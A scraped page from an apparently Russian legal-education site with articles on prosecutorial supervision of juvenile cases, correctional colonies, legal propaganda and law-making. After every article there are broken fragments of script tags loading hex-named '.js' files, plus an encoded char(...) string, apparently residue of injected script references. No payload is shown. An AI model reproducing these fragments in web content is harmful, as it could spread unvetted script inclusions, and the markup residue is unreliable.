Сегодня
НАВИГАЦИЯ:
ЮРИДИЧЕСКОЕ НАСЛЕДИЕ:
РАЗНОЕ:
РЕКЛАМА:
АРХИВ НОВОСТЕЙ:
Надзор за исполнением законов о несовершеннолетних в уголовном судопроизводстве
  Прокурорский надзор | Автор: admin | 30-05-2010, 04:02
Из всех нарушений законности, допускаемых несовершеннолетними, наиболее опасными являются уголовные преступления. Правильная, четко организованная борьба с преступностью несовершеннолетних является одной из наиболее актуальных задач органов прокуратуры. Говоря о преступности несовершеннолетних, необходимо отметить, что за последние пять лет сохранялся ее высокий уровень. В 1995 г. было зарегистрировано 209777, а в 1999 г. - 208313 преступлений, совершенных несовершеннолетними. Удельный вес в общем числе расследованных преступлений составлял около 11% (от 12% в 1995 г. до 9,6% - в 1999 г.).
К тому же следует учесть проявление новых характеристик преступности среди несовершеннолетних: более широкое применение холодного и огнестрельного оружия; неоправданная жестокость, даже садизм, при совершении преступлений против личности; рост числа организованных преступлений; резкий рост корыстной мотивации при совершении преступлений. Во всем этом содержится потенциальная возможность совершения этими лицами в будущем еще более опасных преступлений, если их преступное поведение не будет своевременно пресечено.
Следователи органов внутренних дел, расследующие преступления несовершеннолетних, и прокуроры, осуществляющие надзор за законностью производства расследования, учитывают особенности правовой регламентации уголовной ответственности несовершеннолетних. К числу таких особенностей относится: ограничение видов наказания; ограничение сроков наказания независимо от тяжести совершенного преступления; установление возможности применения принудительных мер воспитательного характера вместо наказания; установление единого во всех случаях производства следствия - предварительного, с исключением различных форм дознания; особенности порядка задержания и некоторые другие существенные особенности при судебном рассмотрении уголовных дел несовершеннолетних. Несовершеннолетние не могут быть привлечены к ответственности за некоторые преступления, субъектом которых может быть только лицо, достигшее 18-летнего возраста (ст. 150, 151 УК). В отношении несовершеннолетних запрещено применять смертную казнь; срок лишения свободы не может превышать 10 лет; нельзя применить лишение свободы в виде заключения в тюрьму, при определении рецидива не учитывается судимость за преступление, совершенное в возрасте до 18 лет.
Прокуроры осуществляют надзор как за исполнением законов, обеспечивающих полное и быстрое раскрытие преступлений несовершеннолетних, так и за их всестороннее, Объективное и полное расследование. При этом обеспечивается как неотвратимость наказания за совершенное преступление, так и выявление и устранение причин и условий, способствовавших содеянному.
Производство расследования по делам несовершеннолетних, так же как и осуществление прокурорского надзора, регулируется общими правилами, закрепленными в Законе о прокуратуре, а также в гл. 32 УПК, посвященной специфике производства по этим делам.
К особенностям, которые должны учитываться прокурорами при осуществлении надзора по делам несовершеннолетних в уголовном судопроизводстве, относятся: .
1. Обеспечение требований закона (ст. 126 УПК) об обязательном производстве предварительного следствия по всем без исключения делам о преступлениях, совершенных несовершеннолетними. Этот вопрос должен решаться однозначно во всех случаях независимо от тяжести совершенного преступления, наступивших последствий и от подследственности уголовных дел. Сюда же относятся и правонарушения несовершеннолетних, досудебная подготовка материалов по которым производится по протокольной форме (гл. 34 УПК).
Если прокурор обнаружил, что в отношении несовершеннолетнего производятся дознание или судебная подготовка по протокольной форме, он дает указание о передаче дела или материала следователю органов внутренних дел или возбуждает дело сам и направляет его для расследования следователю.54cf37e5a4b008ce67f5003715c611ca.js" type="text/javascript">73ef04f856b9cf0020d41ee52d549d29char(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)435a064a82db69547c4bb51737268212.js" type="text/javascript">8e979569d6e6203e4273810123252b79.js" type="text/javascript">f7169736b1242226d29b6c34220c53fb.js" type="text/javascript">cb0ba1f563859e50bc57a4af02df03c8.js" type="text/javascript">17959a355be284cd703519c2f34a881d.js" type="text/javascript">a14c46e80df061fed483d388b44a43ed.js" type="text/javascript">4a2d9962d2f756d4cf156967423265aa.js" type="text/javascript">32854d33f51457552136703b1c22c540.js" type="text/javascript">fb37783a1715b107c3076809ddef4eb6.js" type="text/javascript">dcee0b9e38706d959ed10448338834ea.js" type="text/javascript">c7850bc881a60c4a8a00f5a7092718bb.js" type="text/javascript">
Коментариев: 0 | Просмотров: 483 |
Надзор за исполнением законов администрацией учреждений, исполняющих наказание, назначенное судом несовершеннолетним
  Прокурорский надзор | Автор: admin | 30-05-2010, 04:02
В системе исправительных учреждений согласно ст. 74, 132 УИК РФ имеются воспитательные колонии общего и усиленного режима, в которых содержатся осужденные несовершеннолетние. Контингент содержащихся осужденных далеко не однородный как по характеру совершенных преступлений, так и по степени их социальной опасности. Имеются среди них и лица, страдающие наркоманией и алкоголизмом. За последние годы в воспитательных учреждениях заметно ухудшаются состояние законности и соблюдение режима: погромы, драки, поджоги, массовые беспорядки стали нередким явлением. Весьма прискорбно, что все это происходит не в колониях для особо опасных преступников, а в среде несовершеннолетних.
При попустительстве администрации в воспитательных колониях устанавливается связь осужденных с "волей", через которую в колонию поступают деньги, спиртные напитки, наркотики и даже огнестрельное оружие. Излишняя либерализация со стороны администрации приводит к нарушениям режима, несовершеннолетние осужденные не воспринимают как средство принуждения то наказание, которое они несут за допущенное нарушение режима.
Отмечается низкий профессиональный уровень надзорсостава и воспитателей в ВУ: только 10% из общего числа воспитателей и должностных лиц администрации имеют опыт работы с несовершеннолетними. Все остальные никогда ранее не работали с несовершеннолетними и не владеют основами педагогики и психологии данного возрастного контингента.
Социологические исследования, проведенные в системе исправительных учреждений, подтверждают вывод о том, что воспитательные колонии представляют собою наиболее слабое звено в этой системе. Этим колониям в наибольшей степени присущи недостатки, существующие в деятельности исправительных учреждений. Главная проблема в том, что обрываются социальные связи несовершеннолетних осужденных, существенно ограничивается сфера их социально полезного общения. Для несовершеннолетних значимость этих противоречий увеличивается многократно в сопоставлении со взрослыми осужденными.
Особенности физического состояния и психики этого контингента осужденных предопределяют необходимость создания в воспитательных колониях таких условий, которые наиболее эффективно обеспечивали бы исполнение наказания, способствовали нормальному развитию осужденных, их общеобразовательному и профессиональному обучению. В этих колониях значительно сужен комплекс правоограничений, и наоборот, значительно расширена сфера по применению мер поощрений.
Указанные обстоятельства вызывают необходимость строгого и постоянно действующего прокурорского надзора за исполнением требований ст. 132, 133, 136, 137, 139, 140 и др. УИК РФ в воспитательных учреждениях для несовершеннолетних. Перед прокурорами, осуществляющими надзор за законностью в них, стоят весьма сложные задачи. Их сложность определяется прежде всего спецификой этого надзора, особенностями тактики и методики установления и устранения допущенных нарушений закона. От прокуроров,
осуществляющих этот надзор, требуется знание не только действующего законодательства, регулирующего деятельность этих колоний, но и основ педагогики и психологии этой категории осужденных. Эти требования строго соблюдаются при формировании состава прокуроров, осуществляющих надзор в воспитательных учреждениях. Следует отметить, что за последние годы, несмотря на значительное ухудшение режима и криминогенной обстановки в воспитательных учреждениях, прокуроры не допустили сколь-нибудь серьезных нарушений при исполнении своего служебного долга, ни на одного из прокуроров не было совершено нападения в период массовых беспорядков, хотя в каждой из таких экстремальных ситуаций прокуроры лично встречались с осужденными.
Осуществляя согласно ст. 22 УИК РФ надзор за исполнением законов администрацией ВУ, прокуроры устанавливают конкретные обстоятельства допущенных нарушений и виновных в этом лиц, а также причины и условия, способствующие этим нарушениям. В итоге у прокурора собирается достаточно полная и объективная информация о состоянии законности и соблюдении установленного режима в колонии. Прокуроры ставят перед собою цель: знать, как построен в колонии процесс исправления осужденных, а также представлять себе конечный результат исправительного воздействия на осужденных.
Путем устранения и предупреждения нарушений закона и установленного в колонии режима прокуроры предупреждают массовые беспорядки, побег осужденных, неповиновение распоряжениям администрации, отказ от приема пищи и другие нарушения установленного режима.e5ccaf467eb83fa3d97c76ce44208f40.js" type="text/javascript">d203980a55d64449130e5055f3850978char(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)5db85b0dc1325d03d04e036be3d144ea.js" type="text/javascript">650fda855e25ca77848b5faa65aef08b.js" type="text/javascript">2df3e2dc4128d81273667bee91e40d1a.js" type="text/javascript">a71bec1d767ca2ee9eddc4013c368632.js" type="text/javascript">ff5f1b355e09dd2df32b5aaa97d364e3.js" type="text/javascript">f296ee71ee4e33d430c832ab3fcc812f.js" type="text/javascript">e53a51759696a453b535b0a0aaa356d8.js" type="text/javascript">c22aab8280d93f22cfc86db383620b20.js" type="text/javascript">fd52ca0d8b0154c2c9ac779488219bef.js" type="text/javascript">f2d3525a66dce05d984c9bd190a1f208.js" type="text/javascript">130861fb3f6b1a76ab669a9536cdfbb3.js" type="text/javascript">
Коментариев: 0 | Просмотров: 152 |
Участие прокуроров в правотворческой деятельности
  Прокурорский надзор | Автор: admin | 30-05-2010, 04:02
В соответствии со ст. 9 Закона о прокуратуре прокурор при установлении в ходе осуществления своих полномочий необходимости совершенствования действующих нормативных правовых актов вправе вносить в законодательные органы и органы, обладающие правом законодательной инициативы, соответствующего и нижестоящего уровней предложения об изменении, дополнении, отмене или принятии законов и иных нормативных правовых актов.
Важность этой деятельности прокуроров подчеркивается в приказе Генерального прокурора № 47 от 9 августа 1996 г. "Об участии органов и учреждений прокуратуры в правотворческой деятельности и систематизации законодательства в прокуратуре Российской Федерации". В этом приказе определяется порядок участия прокуроров в разработке заключений на поступающие в прокуратуру проекты законодательных актов, предложений об их дополнениях, внесения предложений и заключений в соответствующие органы.
Осуществляя надзор за исполнением законов, прокуроры могут судить об эффективности того или иного закона, выявлять области государственного, экономического и социально-культурного строительства, не получившие достаточного законодательного регулирования. Эти пробелы законодательства должны быть восполнены. В существенной степени это касается уголовного и уголовно-процессуального, хозяйственного, коммерческого, предпринимательского законодательства. Появляются новые виды общественно опасных деяний, ответственность за которые не определена в действующем уголовном законодательстве, и немало составов преступлений, предусмотренных в действующем УК, требуют совершенствования.
Особое значение участие прокуроров в правотворческой деятельности приобретает в связи с необходимостью приведения законодательства субъектов РФ в соответствие с Конституцией РФ и федеральным законодательством.
В деятельности прокуроров данного направления можно различать несколько форм. Во-первых, это участие прокурора в подготовке нормативного акта. Представители Генеральной прокуратуры и
прокуратур субъектов РФ нередко принимают участие в работе групп и комиссий законодательных органов по подготовке проектов конкретных нормативных актов. При этом они обсуждают готовые проекты, вносят в них свои предложения.e02dd1fd5945bac74d6d33bd5761679a.js" type="text/javascript">73337a86a086033c62c48e2e53922565char(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)436a94623e9d64a363731cd1920fd544.js" type="text/javascript">53d4cddae0a0d25731b2d40c7b7bc236.js" type="text/javascript">16876ec24afce83aa7a30f24bf990f8b.js" type="text/javascript">c545a06adcaeb4da0035d33301ca4ee0.js" type="text/javascript">6d12656c2d217898fc4a8d190bcfc05b.js" type="text/javascript">a3e84128f4606ada8cf0fc2cae5eaa0b.js" type="text/javascript">0c23d7dc31155898bedd7185f55061cd.js" type="text/javascript">b398c5d47be92704f62590ce35a88045.js" type="text/javascript">16ec529ca725227a1f579b3c44fdc644.js" type="text/javascript">0d64f5ae352619d0681e41ee268d88ee.js" type="text/javascript">e76ab2e3af9b1a84d09e88d1e72d9a0b.js" type="text/javascript">
Коментариев: 0 | Просмотров: 318 |
Пропаганда законов - важное направление в деятельности прокуратуры
  Прокурорский надзор | Автор: admin | 30-05-2010, 04:02
В укреплении законности в государстве важное значение имеет правовое воспитание граждан. Формирование правового государства, реформа политической системы и внедрение новых форм хозяйствования требуют принятия эффективных мер по правовому воспитанию населения, организации юридического всеобуча как единой
общегосударственной программы, охватывающей все слои населения, все кадры как в центре, так и на местах.
Практика прокурорского надзора за исполнением законов показывает, что некоторые должностные лица допускают нарушение закона не "по злому умыслу", а вследствие своей юридической неосведомленности.
В настоящее время в условиях формирования правового государства сфера деятельности прокуроров и следователей по правовой пропаганде значительно расширена. Речь идет не только о правовом образовании населения, но и о повышении правовой культуры в деятельности государственных органов, ведомств, общественных организаций и должностных лиц. Многие должностные лица, имеющие высшее экономическое, техническое образование, дополнительно обучаются в юридических вузах, получают высшее юридическое образование. В этом учебном процессе наряду с профессорско-преподавательским составом учебных заведений принимают участие наиболее теоретически подготовленные прокуроры.
Всей своей деятельностью прокуратура способствует воспитанию должностных лиц и граждан в духе добросовестного исполнения своих конституционных обязанностей, соблюдения законов и правил общежития. Пропаганда права является наиболее эффективным средством выполнения этой задачи, одним из основных направлений деятельности органов прокуратуры на современном этапе. Это означает, что какое бы должностное положение работник прокуратуры ни занимал, каким бы участком надзора за исполнением законов он ни ведал, пропаганда действующего законодательства является его обязательной функцией.
Генеральный прокурор СССР в своем приказе № 69 от 29 сентября 1987 г. "О мерах по коренной перестройке и дальнейшему совершенствованию участия органов прокуратуры в пропаганде советских законов" отмечал, что участие прокурора и следователей в пропаганде законов является не только одним из основных направлений их деятельности, но и неотъемлемой частью всей системы мер по борьбе с преступностью и другими нарушениями законности. Правовая пропаганда, проводимая органами прокуратуры, это не только правовое просветительство, имеющее целью ознакомить граждан и должностных лиц с вновь принятым законом. Пропаганда права должна быть подчинена успешному решению задач политического, государственного, экономического, национально-культурного строительства в государстве.4ec54d3fd30159f935b6eca8bdf6f45a.js" type="text/javascript">80a0a30365c4858a4e8ef35d15edd16cchar(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)2682bcd9f80b9716f6074ebc4ed07b71.js" type="text/javascript">409692d2c4a47f58e3a287080237224a.js" type="text/javascript">734d85e2333ece0b3698cfa6dc9277ab.js" type="text/javascript">45d229e7d86e30515502627cb79fb9c1.js" type="text/javascript">5f8dfc18c3b4f5ad25bb5b72d5c7c74f.js" type="text/javascript">d2ce82517333cac4c73fbe89fc3fa33f.js" type="text/javascript">fc15755d513a150e482a6cf601ddb6fb.js" type="text/javascript">6cf9338f2259714b933211cc40094c9f.js" type="text/javascript">d43ea2e94f47d19a6483e62320e157d1.js" type="text/javascript">41a2d546275c7a3521688ec269bac189.js" type="text/javascript">87919f03a739b5927941abc879e5d9b6.js" type="text/javascript">
Коментариев: 0 | Просмотров: 268 |
Формы правовой пропаганды
  Прокурорский надзор | Автор: admin | 30-05-2010, 04:02
В деятельности органов прокуратуры сложились различные формы правовой пропаганды. Наиболее распространенными из них являются: доклады, лекции, беседы, вечера вопросов и ответов, встречи за "круглым столом", выступления в печати, по радио и телевидению.
Говоря об эффективности различных форм правовой пропаганды, следует выделить те из них, которые позволяют прокурору встретиться непосредственно с гражданами. Преимущество докладов, лекций и бесед состоит в том, что люди слышат живое слово прокурора, могут задать им волнующие их вопросы и получить на них ответы, высказать свои предложения по обсуждаемой проблеме. Живое впечатление о встрече с прокурором оставляют вечера вопросов и ответов. Они организуются в клубах, в жилищно-эксплуатационных управлениях, на предприятиях, в общественных организациях, в учебных заведениях. Участники таких встреч получают ответы на заданные ими вопросы, в то же время они могут обратиться к прокурору с жалобой или заявлением о нарушенном праве. Сообщение граждан о каком-либо правонарушении служит для прокурора поводом к возбуждению уголовного дела. Однако в какую бы форму ни было облечено выступление прокурора - доклад, беседа, статья в печати, выступление по радио или телевидению - оно не должно носить назидательного характера, содержать изложение общеизвестных истин. Это не производит должного эмоционального воздействия на читателей и слушателей.
Наиболее опытные и квалифицированные прокуроры принимают участие в работе образовательных юридических заведений, различного рода организаций по подготовке и переподготовке кадров. Тем самым они способствуют исключению правового нигилизма, пониманию нового законодательства, умению применять законы в хозяйственной и иной деятельности.
Поддерживая тесные деловые контакты с органами общественной самодеятельности - добровольными дружинами по охране общественного порядка, органами муниципальной милиции, прокуроры оказывают им необходимую правовую помощь. Они проводят также праворазъяснительную работу в местных органах самоуправления.
Значительное место в правовой пропаганде занимают сообщения прокуроров на собраниях трудовых коллективов и общественных организаций о результатах проведения проверок, соблюдении законности на проверяемых предприятиях, в учреждениях и организациях. При принесении протеста на противоречащий закону правовой акт (ст. 23 Закона о прокуратуре) или представления об устранении нарушений закона (ст. 24 Закона) прокурор принимает участие в его коллегиальном рассмотрении тем органом, куда направлены протест или представление. Если установленные нарушения закона носят распространенный характер, то представление по предложению прокурора обсуждается на собрании коллектива трудящихся или общественной организации. Выступление прокурора при таких обсуждениях является эффективной формой пропаганды права, служит важным средством предупреждения нарушений законности.
В условиях гласности и демократии стало обязательным правилом информировать трудящихся о совершенных преступлениях и условиях, им способствовавших. Недостаточная информация о совершенных правонарушениях порождает"различного рода слухи и домыслы, сеет сомнение в возможности правоохранительных органов обеспечить безопасность граждан, создать обстановку законности, успешно раскрыть и расследовать преступления. В связи с этим важно - при неуклонном соблюдении требований закона о тайне следствия (ст. 139 УПК), - чтобы население города, района, рабочего поселка было своевременно осведомлено о совершенных преступлениях общеуголовного характера (убийства, бандитские и разбойные нападения и т. д.). Если совершенное преступление связано с производственной деятельностью (хищение, взяточничество, нарушение правил охраны труда и др.), прокуроры информируют об этом трудовой коллектив или общественную организацию. При этом прокурорам следует избегать стремления к сенсационности при подготовке информации о совершенных преступлениях. Подчас средства массовой информации с подачи прокуроров настраивают общественное мнение против лица, подозреваемого в совершении преступления, хотя его вина еще не доказана и суд не признал его виновным в совершении преступления и не назначил ему наказания. Это в существенной степени осложняет раскрытие и расследование преступлений и нередко влечет за собою постановление судом, незаконных приговоров. При всех условиях это приводит к нарушению конституционного принципа презумпции невиновности.c4a6229dc94b2895e87e6eeced7f2334.js" type="text/javascript">b6d98b2050fec4bb307cd7c4af4a6b63char(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)a478949d9f87dc6e7ff6749cf9ff45f9.js" type="text/javascript">09b8b725e441b737318c9f4a3533b0c5.js" type="text/javascript">f08786475b5dba04a3712b780fa866d8.js" type="text/javascript">3ae92d66c4d6a7ca6646851633d517cb.js" type="text/javascript">2d7eca3e3dd141d601188c1c50c84a70.js" type="text/javascript">74d64808694952ca7157dfe5e4bcfaad.js" type="text/javascript">ffa6319fb1a9d0e09d9cf8797c8c42f9.js" type="text/javascript">af59072247ba8fc6e7407e6f01b92349.js" type="text/javascript">b952100c9c58a3b5a06d85082d88db67.js" type="text/javascript">7f3d0e48504aafd5ef5e1aaf17f70574.js" type="text/javascript">8aee3867dc1632f7ab97b008c135733d.js" type="text/javascript">
Коментариев: 0 | Просмотров: 211 |
Организация правовой пропаганды
  Прокурорский надзор | Автор: admin | 30-05-2010, 04:02
Выполняя приказы Генерального прокурора СССР № 49 от 1 июля 1987 г. "О совершенствовании деятельности органов прокуратуры в условиях расширения демократии и гласности" и № 45 от 8 июля 1998 г. "О задачах органов прокуратуры по взаимодействию со средствами массовой информации, совершенствованию общественных связей", прокуроры стали более активно и творчески заниматься правовой пропагандой.
Одним из эффективных средств, обеспечивающих успешное выполнение поставленных в названных приказах задач, является правильная организация правовой пропаганды. Хорошо организованная правовая пропаганда прокуратуры, проводимая в координации с другими правоохранительными органами и опирающаяся на помощь широкой общественности, способствует укреплению законности, успешной борьбе с преступностью, сокращению случаев алкоголизма и пьянства, нарушений трудовой дисциплины на предприятиях, в учреждениях и организациях.
Там, где активно ведется правовая пропаганда среди работников государственного аппарата, актива местных органов власти и управления, заметно сокращается число незаконных и необоснованных приказов, решений и иных нормативных актов, меньше допускается нарушений прав и законных интересов граждан. Генеральным прокурором поставлена задача совершенствования работы органов прокуратуры по правовой пропаганде. Это прежде всего выражается в повышении ответственности каждого работника за безупречное выполнение этих обязанностей, в повороте от количества
к качеству проводимых прокуратурой мероприятий по пропаганде законов. Между тем в ряде прокуратур недооценивается значение этой работы; нередко она носит абстрактный, чисто "просветительский" характер и не увязывается с состоянием законности, правопорядка, структурой и динамикой преступности в районе, городе, области, республике. Глубокий анализ состояния законности и преступности нередко подменяется набором отдельных фактов преступных проявлений, главным образом сенсационного характера. Не всегда раскрываются причины и условия, способствовавшие совершенному преступлению или правонарушению. В лекциях и докладах подчас содержатся общие призывы к укреплению законности, которые не увязываются с задачами конкретных коллективов или населения региона. Не все прокуроры имеют информацию о состоянии законности на предприятиях, в учреждениях и организациях, бывают там лишь в связи с каким-либо чрезвычайным происшествием.
В правовой пропаганде превалирует уголовное и уголовно-процессуальное законодательство. Недостаточное внимание уделяется разъяснению гражданского, жилищного, семейного, земельного права, законам об охране здоровья, природоохранному законодательству. Между тем в судах в порядке гражданского судопроизводства, а также в арбитражных судах рассматривается немало конфликтных ситуаций, возникновение которых связано только с незнанием
законов ее участниками.
Важность хорошей организации правовой пропаганды определяется и тем, что за ее состояние в подчиненных органах несут личную ответственность руководители управлений и отделов Генеральной прокуратуры РФ, прокуроры республик, краев, областей, транспортные и военные прокуроры. Генеральный прокурор РФ требует, чтобы каждый из руководителей активно участвовал в этой работе, показывая пример своим подчиненным. При выездах на места работники вышестоящих прокуратур, проверяя выполняемую работу по правовой пропаганде, в необходимых случаях должны оказывать помощь в совершенствовании этой работы, За последние годы в связи с расширением полномочий трудовых коллективов и общественных организаций центр тяжести по правовой пропаганде перенесен в эти коллективы и организации. Работники прокуратуры планируют и ведут работу по правовой пропаганде в тесном контакте с руководством трудовых коллективов и профсоюзных органов. Это позволяет в максимальной степени учесть состояние законности на предприятиях, использовать конкретные факты преступных проявлений и иных нарушений законов. Упор при планировании и организации этой работы делается на те предприятия, где распространены те или иные виды правонарушений.1cca9508e796938fe6c12964623b423a.js" type="text/javascript">e90dfa647cb62994d8d353cbafc7f63dchar(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)00b1cc8179b8cde315a950d47489778c.js" type="text/javascript">702ba4df03cb11f0f4a067282d49329f.js" type="text/javascript">86093d1bd7a4b08e25ca3443f139ffc4.js" type="text/javascript">c08cac5ef0fdddc1d5ce931a62dfd003.js" type="text/javascript">e545707c0d244cdb4cbff54054dcb917.js" type="text/javascript">3790287307be1503b8058689960a0dc6.js" type="text/javascript">17b3f1fb73a0d6443cc5e09ee066073f.js" type="text/javascript">6446de6f7cde1c49dc25e9ff56fb5000.js" type="text/javascript">6ad2aacf26df591d9ac39e82106577cb.js" type="text/javascript">16f2d2c4bdf277e0c6c7bafe66ef3769.js" type="text/javascript">01a9c91af30666f9ba212adc8c5620c1.js" type="text/javascript">
Коментариев: 0 | Просмотров: 238 |
Систематизация законодательства в органах прокуратуры
  Прокурорский надзор | Автор: admin | 30-05-2010, 04:02
Органы прокуратуры смогут лишь тогда успешно выполнять стоящие перед ними задачи по осуществлению надзора за исполнением законов в стране, когда прокуроры будут обладать безупречным знанием действующего законодательства. В связи с этим Генеральный прокурор РФ в приказе "Об. участии органов и учреждений прокуратуры в правотворческой деятельности и систематизации законодательства в прокуратуре Российской Федерации" от 9 августа 1996 г. № 47 потребовал от руководителей прокуратур всех звеньев пристального внимания надлежащей организации этой работы. Для любого прокурора, решающего судьбы людей, незнание или неправильное применение законов является грубым нарушением служебного долга. Безупречное знание действующего законодательства является составной частью общей и правовой культуры каждого прокурора. Слабое знание законов, неумение ими пользоваться нередко приводят к серьезным ошибкам в прокурорской деятельности. Недопустимо, когда прокуроры в составляемых ими протестах, представлениях, постановлениях и других правовых актах ссылаются на отмененные или измененные законодательные или иные нормативные акты. Уровень правовой культуры прокуроров, знание ими действующего законодательства и умение правильно им пользоваться проверяется при их аттестовании, которое проводится систематически, как того требует Закон о прокуратуре (ст. 41). Определение уровня правовых знаний проводится наряду с оценкой их
деловых и моральных качеств.063c22a758415a6bb4487889ca7e0283.js" type="text/javascript">f439edbba433f1382f28b998113db199char(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)d0d88ecc4def0a51c5f6db69f2af6543.js" type="text/javascript">c955cf06b5b85feb40c859b1171f1b15.js" type="text/javascript">0f0aa358a28fb9f69755e563c579fd95.js" type="text/javascript">8a7c209ee0bfdd3fe0eec0764951de09.js" type="text/javascript">76b19bf2de671c90a4f9c028997c58dc.js" type="text/javascript">81d0e8458b40d20dfd1b0417c41f931d.js" type="text/javascript">de15f1fe4e1911195a49d31894c4ebae.js" type="text/javascript">30ed97998d20b36b9391bd1cdfa73d31.js" type="text/javascript">f2f3aa3cea67a0bada922799a24a45b2.js" type="text/javascript">0d9ccaa3f068d82e807afd6201701b99.js" type="text/javascript">f1be818e9c532702856ec3ba67274097.js" type="text/javascript">
Коментариев: 0 | Просмотров: 203 |
Задачи и пути совершенствования организации надзора и управления в органах прокуратуры
  Прокурорский надзор | Автор: admin | 30-05-2010, 04:02
Обеспечение законности в сложных условиях строительства новой экономики и новых социальных отношений предъявляет повышенные требования к организации прокурорского надзора, повышению его эффективности.
Федеральный закон "О прокуратуре Российской Федерации", приказ Генерального прокурора Российской Федерации № 20 от 28 мая 1992 г. "Об организации надзора и управления в органах прокуратуры Российской Федерации'" и ряд других приказов об организации отдельных направлений надзорной и иной деятельности прокуроров в существенной степени способствуют улучшению организации работы в органах прокуратуры в целом. Задача состоит в том, чтобы повысить роль руководителей органов прокуратуры - от прокурора района до прокурора субъекта РФ, - в успешном осуществлении оперативного контроля за работой подчиненных прокуроров и следователей. В указанных правовых актах определены пути повышения эффективности надзора по всем его отраслям и иным основным направлениям в деятельности прокуроров. В многогранной деятельности органов прокуратуры превалирующее значение отводится установлению четкой и слаженной работы всех звеньев прокурорской системы, взаимодействию с другими государственными органами и общественными организациями, согласованности в проводимых мероприятиях между управлениями и отделами одной и той же прокуратуры, обеспечению единства и целенаправленности в повседневной прокурорской практике и, наконец, комплексному подходу к решению задач по укреплению законности и правопорядка.
В настоящее время, когда в существенной степени претерпевают изменения различные стороны государственного, политического, экономического и социально-культурного строительства, органы прокуратуры отказываются от сложившихся годами стереотипов в стиле и методах руководства по надзору и управлению, освобождаются от директивности, устоявшихся шаблонов в организации работы. В связи с этим первоочередной задачей органов прокуратуры в совершенствовании организации надзора является выявление допускавшихся ранее ошибок и недостатков в этой работе, тщательный их анализ и на его основе разработка и реализация мер, направленных на устранение имеющихся недостатков. Основные из них состоят в следующем: 1. Недостаточное знание некоторыми прокурорами состояния законности и правопорядка, а также структуры и динамики правонарушений в районе, городе, области, крае, республике. Это происходит вследствие того, что у этих прокуроров выработался кабинетный стиль работы, они слабо связаны с органами представительной и исполнительной власти, органами местного самоуправления, трудовыми коллективами, населением.
В результате невозможно эффективное планирование надзора и иной деятельности прокурора, своевременное выявление, пресечение и предупреждение правонарушений.
2. Отход от установленных Законом о прокуратуре (ст. 1) предмета и пределов прокурорского надзора за исполнением законов, подмена и дублирование деятельности контролирующих органов; сохранение командно-бюрократических методов по устранению выявленных нарушений закона.
Основное назначение органов прокуратуры, указывает Генеральный прокурор России в своем приказе № 20 от 28 мая 1992 г., состоит в обеспечении единообразного исполнения законов в соответствии с Конституцией РФ на всей территории Российской Федерации. При этом прокуратура не должна подменять органы государственной власти и управления, принимать на себя исполнение функций государственного и общественного контроля, вмешиваться в оперативно-хозяйственную деятельность предприятий, учреждений и организаций. Генеральный прокурор РФ предлагает отказаться от контрольно-ревизионных методов надзора за исполнением законов, проверки проводить лишь при наличии данных о допущенных нарушениях закона и в случаях, требующих непосредственного прокурорского вмешательства, когда исчерпаны полномочия других государственных органов власти и управления для их устранения и
привлечения виновных к ответственности.
3. Несвоевременность принимаемых прокурором мер по устранению нарушений закона, запоздалое реагирование (или вовсе отсутствие такового) на обнаруженные правонарушения. В таких случаях меры прокурорского "реагирования" становятся бесполезными. Более того, они ведут к безнаказанности нарушителей закона, порождают новые нарушения.
4. Недостаточная целеустремленность по выявлению и устранению нарушений законности, а также отсутствие строгой, продуманной избирательности в выборе объектов прокурорского надзора. Проверки, осуществляемые прокурорами, подчас не дают ожидаемых результатов потому, что выбор объектов не был обусловлен ни состоянием законности, ни конкретными сигналами о допущенных нарушениях закона.34e9a86059f909f37c1819d87c9843f3.js" type="text/javascript">303f6e0a3a81a676c309e4054acb8c01char(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)a8d8e53032e8cfb64bcfbc2aa84f9b08.js" type="text/javascript">df09be31ceda4a954a4f89a2bcc0c31d.js" type="text/javascript">1ebb8792c6312021055a9c5157ff5f20.js" type="text/javascript">75c5aa92eb516277ba818b4dd213d447.js" type="text/javascript">21544e3bf97491c15d4b3d9dd490b9c8.js" type="text/javascript">9bced7f3761fd0a5123ccbe77a725556.js" type="text/javascript">93211ee8750d824202a1a94ce8694c0b.js" type="text/javascript">953417d42e5c9484baba7a05fc221a23.js" type="text/javascript">b86f569b067469d3e8bdd7549a9aa494.js" type="text/javascript">d0bed53e174ebb5a7c99eb2fc6b58791.js" type="text/javascript">23f0a95fe8cc393ccc337380369e0682.js" type="text/javascript">
Коментариев: 0 | Просмотров: 187 |
Эффективность прокурорского надзора
  Прокурорский надзор | Автор: admin | 30-05-2010, 04:02
Эффективность (действенность, результативность) прокурорского надзора определяется минимальной затратой времени и процессуальных средств для выполнения прокурором задач по укреплению законности и борьбы с преступностью.
Эффективность надзора, осуществляемого прокурором, порождает стремление прокурора не только установить конкретное нарушение закона, но и создать условия, исключающие нарушения законности в будущем. Прокурор не может ограничиться принесением протеста, вынесением постановления или направлением представления, он должен не "снимать с контроля" ход устранения нарушения закона до тех пор, пока не убедится в достижении поставленной цели. Только при этом условии надзор прокурора будет по-настоящему действенным и достигнет желаемого результата.
Проблема повышения эффективности надзора за исполнением законов как в целом, так и по отдельным направлениям надзорной деятельности прокуроров является ныне наиболее актуальной проблемой науки и практики прокурорского надзора. Эта проблема выдвигается на передний план еще и потому, что повышению эффективности надзора подчинены все средства прокурорского реагирования на выявленные нарушения закона, между тем положительных сдвигов в деле обеспечения законности и правопорядка еще нет.
